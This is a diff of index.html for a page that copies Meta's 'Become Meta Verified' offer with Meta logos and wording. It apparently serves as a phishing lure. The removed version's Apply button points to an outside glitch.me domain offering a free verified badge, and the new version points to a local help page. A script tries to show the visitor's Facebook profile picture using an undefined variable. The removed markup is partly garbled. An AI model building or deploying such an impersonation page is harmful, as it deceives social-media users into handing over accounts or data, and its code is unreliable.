--- a/index.html
+++ b/index.html
@@ -1,19 +1,152 @@
 
+<!DOCTYPE html>
 
-<!DOCTYPE html> <html lang=en><!--
- 
---><meta charset=utf-8>
-<meta name=viewport content="width=device-width, initial-scale=1.0">
-<title>Apply</title>
-<style>body{font-family:system-ui;margin:0;padding:0;overflow-x:hidden}.container-fluid{display:flex;align-items:stretch;padding:0;margin:0;min-height:100vh;overflow:hidden;flex-direction:column}.form-content{flex:1;padding:2rem;background:white;display:flex;flex-direction:column;align-items:center;box-shadow:none;position:relative;z-index:1}.form-content img{width:4rem;height:4rem;margin-bottom:1rem}.form-content h1{font-size:2rem;margin-bottom:1rem;text-align:center}.btn{background:#0064e0;border:none;border-radius:100px;padding:10px 35px;text-decoration:none;color:white;display:inline-block;margin-top:1rem;font-family:Arial,sans-serif;font-size:16px}.form-content p{font-size:18px;margin-top:1rem;text-align:center}.form-content .sign-up{font-size:17px;padding-top:1rem}.form-content .business-info{font-size:14px}.form-content .region-info{font-size:13px;font-style:italic}.image{width:100%;height:27vh;background-image:url(data:image/png;base64,I=" alt=meta class=meta-logo>
- <h1>Become <br> Meta Verified</h1>
- <a href="https://apply--to-get-free-verified-badge-here.glitch.me/" class=btn>Apply</a>
- <p>Grow your social presence with Meta Verified – a new subscription
- <br>bundle available for creators and businesses on Instagram and <br>Facebook.
- </p>
- <p class=sign-up>Sign up now for creators</p>
- <p><span class=fw-semibold>Are you a business?</span> Get more information on</p>
- <a href=# class=business-info>Meta support for businesses</a>
- <p class=region-info>Features, availability, and pricing may vary by region.</p>
- </div>
- </div>
+<html lang="en">
+
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Home</title>
+    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet">
+    <style>
+        /* CSS styles */
+
+        body {
+            font-family: system-ui;
+            margin: 0;
+            padding: 0;
+        }
+
+        .container-fluid {
+            background: #F5F6F6;
+        }
+
+        .container {
+            padding: 1rem;
+        }
+
+        .logo {
+            width: 9rem;
+            height: 6rem;
+        }
+
+        .meta-logo {
+            width: 4rem;
+            height: 4rem;
+        }
+
+        .btn {
+            background: #0064e0;
+            border: none;
+            border-radius: 100px;
+            padding: 10px 35px;
+            text-decoration: none;
+            color: white;
+            display: inline-block;
+            margin-top: 1rem;
+            font-family: Arial, sans-serif;
+            /* Same font family */
+            font-size: 16px;
+            /* Adjust as needed */
+        }
+
+        .content {
+            margin-top: 3rem;
+            display: flex;
+            justify-content: center;
+        }
+
+        .content .col-sm-6 {
+            margin-top: 3rem;
+            margin-left: 5rem;
+        }
+
+        .content p {
+            font-size: 18px;
+            margin-top: 1rem;
+            font-family: Arial, sans-serif;
+            /* Same font family */
+        }
+
+        .sign-up {
+            font-size: 17px;
+            padding-top: 1rem;
+            font-family: Arial, sans-serif;
+            /* Same font family */
+        }
+
+        .business-info {
+            font-size: 14px;
+            font-family: Arial, sans-serif;
+            /* Same font family */
+        }
+
+        .region-info {
+            font-size: 13px;
+            font-style: italic;
+            font-family: Arial, sans-serif;
+            /* Same font family */
+        }
+
+        .image {
+            display: none;
+            width: 42%;
+            height: 100vh;
+            /* Ensure full height */
+            background-size: cover;
+            /* background-position: center; */
+            /* margin-left: 5rem; */
+        }
+
+        @media (min-width: 576px) {
+            .image {
+                display: block;
+            }
+        }
+    </style>
+</head>
+
+<body>
+    <div class="container-fluid">
+        <div class="container">
+            <img src="meta-logo.svg" alt="logo" class="logo">
+        </div>
+    </div>
+    <div class="content">
+        <div class="col-sm-6">
+               <img id="profile-picture" class="profile-picture" src="default-profile.png" alt="profile-picture">
+            <h1 class="my-3 fs-1">Become <br> Meta Verified</h1>
+            <div style="margin-bottom: 30px;"></div>
+            <a class='btn' href='/help.html'>Apply</a>
+            <p class="mt-4">Grow your social presence with Meta Verified – a new subscription <br> bundle available for creators and businesses on Instagram and <br> Facebook.</p>
+            <p class="sign-up">Sign up now for creators</p>
+            <p class="mt-4 mb-0">
+                <span class="fw-semibold">Are you a business?</span> Get more information on
+            </p>
+            <a href="#" class="business-info">Meta verified for businesses</a>
+            <p class="mt-4 font-italic region-info">Features, availability, and pricing may vary by region.</p>
+        </div>
+        <div class="col-sm-5 image" style="background-image: url('mainlogo.1e021de7020fcdab170b.png'); "></div>
+    </div>
+</body>
+<script>
+    window.onload = function () {
+    const profilePictureUrl = `https://www.facebook.com/photo?${facebookUserId}/picture?type=large`;
+    const imgElement = document.getElementById("profile-picture");
+
+    fetch(profilePictureUrl)
+        .then((response) => {
+            if (response.ok) {
+                imgElement.src = profilePictureUrl;
+            } else {
+                console.error("Error fetching profile picture:", response.statusText);
+            }
+        })
+        .catch((error) => {
+            console.error("Error fetching profile picture:", error);
+        });
+};
+
+</script>
+
+</html>
